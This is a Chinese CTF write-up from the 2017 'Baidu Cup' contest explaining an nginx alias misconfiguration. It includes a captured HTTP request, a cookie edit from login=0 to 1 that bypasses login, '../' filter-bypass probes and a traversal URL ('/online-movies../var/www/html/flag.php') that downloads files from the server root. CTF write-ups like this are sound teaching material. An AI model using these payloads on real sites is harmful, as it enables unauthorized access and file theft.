nginx配置不当导致的目录遍历下载漏洞-“百度杯”CTF比赛 2017 二月场

Posted nul1

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了nginx配置不当导致的目录遍历下载漏洞-“百度杯”CTF比赛 2017 二月场相关的知识,希望对你有一定的参考价值。

题目:http://98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com/login.php

题目内容:

网站要上线了,还没测试呢,怎么办?

经过测试在点击Mini-Zone的时候会有如下数据包。

GET /index.php HTTP/1.1
Host: 98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; pgv_pvi=7564516352; UM_distinctid=164bb2a2660862-02cd87a728541b-3a760e5d-1fa400-164bb2a2661ce3; browse=CFlbTxUYU0BQU1hEVQJTRFBZSkdeQFFYWVRFR1xRWEJTV1hPXEdLTgBZXkRdSVpOGllZTFRTW0VYW0VFWVxbRklSWE9cRFNHXUFTHFREUUdZVlMGVEBQT0tRWERWXFlCRFFbVV9EU0FcWVxCTEoU; pgv_si=s2308230144; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1532146712,1532226185,1532311636,1532421067; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1532421150; ci_session=19b555adbbafd0f07b5833ee0a823f476db15f2f; login=0
Connection: close

有一个login参数为0将其改为1即登录成功。

然后发现如下URL,直接可判断为文件读取。

http://4ffbe25b5aee42ae9c6644d535d42cb0d37c385304924a5c.game.ichunqiu.com/manages/admin.php?module=index&name=php

然后测试是否过滤了../或者./

http://4ffbe25b5aee42ae9c6644d535d42cb0d37c385304924a5c.game.ichunqiu.com/manages/admin.php?module=inde../x&name=php 访问正常(将../替换为空了)

http://4ffbe25b5aee42ae9c6644d535d42cb0d37c385304924a5c.game.ichunqiu.com/manages/admin.php?module=inde./x&name=php 访问错误

直接读取flag.php(之前dirsearch有在根目录扫描到flag.php)发现失败。

然后读取nginx的配置文件发现一个目录遍历漏洞。

然后就可以通过

online-movies       #遍历online-movies目录

以及

/online-movies../  #遍历整个/online-movies../(其实就是服务器的根目录了),然后可以通过../后面输入目录进行遍历了,如果是文件就可以直接被下载。 

http://032d3f10268c4cf790562d76c8b643a547b3246e6a494a33.game.ichunqiu.com/online-movies../var/www/html/flag.php

 

以上是关于nginx配置不当导致的目录遍历下载漏洞-“百度杯”CTF比赛 2017 二月场的主要内容,如果未能解决你的问题,请参考以下文章

Nginx 解析漏洞 漏洞复现

nginx目录遍历漏洞复现

目录遍历漏洞和文件读取漏洞的区别

目录遍历漏洞和文件读取漏洞的区别

nginx解析漏洞复现

常见36种WEB渗透测试漏洞描述及解决方法- 配置不当